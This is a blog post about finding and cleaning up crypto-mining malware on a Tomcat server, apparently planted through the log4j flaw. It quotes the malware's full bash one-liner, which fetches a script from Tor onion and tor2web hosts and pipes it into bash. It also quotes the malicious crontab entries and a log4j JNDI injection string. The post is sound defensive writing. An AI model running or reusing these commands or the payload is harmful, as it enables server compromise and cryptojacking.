Malware Running Bash Process Communicating With Tor2web Sites

Thursday, December 22, 2022

Categories:

Security

3 minute read

If you see the following process running on your server then your server is most likely infected with bitcoin mining malware.

$ ps -ef
...
tomcat    1710  1695  0 11:21 ?        00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat    1725  1710  0 11:21 ?        00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat    1727  1725  0 11:21 ?        00:00:00 curl https://doh.centraleu.pi-dns.com/dns-query?name=relay.l33t-ppl.info
tomcat    1728  1725  0 11:21 ?        00:00:00 grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b
tomcat    1729  1725  0 11:21 ?        00:00:00 tr   \n
tomcat    1730  1725  0 11:21 ?        00:00:00 sort -uR
tomcat    1731  1725  0 11:21 ?        00:00:00 head -1

How did they get into the server?

There are several possibilities, however, in recent days the major reason is the log4j2 security issue.

e.g. If you are logging the username during the login as follows

log.debug("Username : {}", username)

then if the hacker tries to input the username as ${jndi:ldap://attackerserver.com.com/x} then log4j process treats this as a JNDI lookup instead of logging it as a string. Yeah :-)

Hackers use this JNDI lookup to point to their server and download scripts etc and run them in your server. They are also smart enough to mark their scripts to start during system startup.

How to clean this up?

If you are running the server within the cloud like AWS or Google then it is better to relaunch a new instance based on the previous image that wasn’t infected.

If you can’t do that for whatever reason then you may try the following approach to cleanup.

Check and Cleanup the startup process

Check which user is running the above-mentioned processes and switch to that user e.g. in the above example the process was running by tomcat so switch the user as follows.

$ sudo su tomcat

Check the crontab to see the startup process

$ crontab -e

It should probably show the following (in addition to one that you already configured if any)

HELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=''
HOME=/
* * * * * /tmp/pty3 > /dev/null 2>&1 &
* * * * * /dev/shm/pty3 > /dev/null 2>&1 &
* * * * * /var/lock/pty3 > /dev/null 2>&1 &
* * * * * n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is

Remove all these.

In the application user’s directory check if there are any new files created. e.g. in the tomcat bin, logs, etc directory, and delete them if you are sure they are not part of the application and they look suspicious. (Take care here not to delete any application or OS-specific files)

Restart your server. You should most probably not see those bash processes anymore.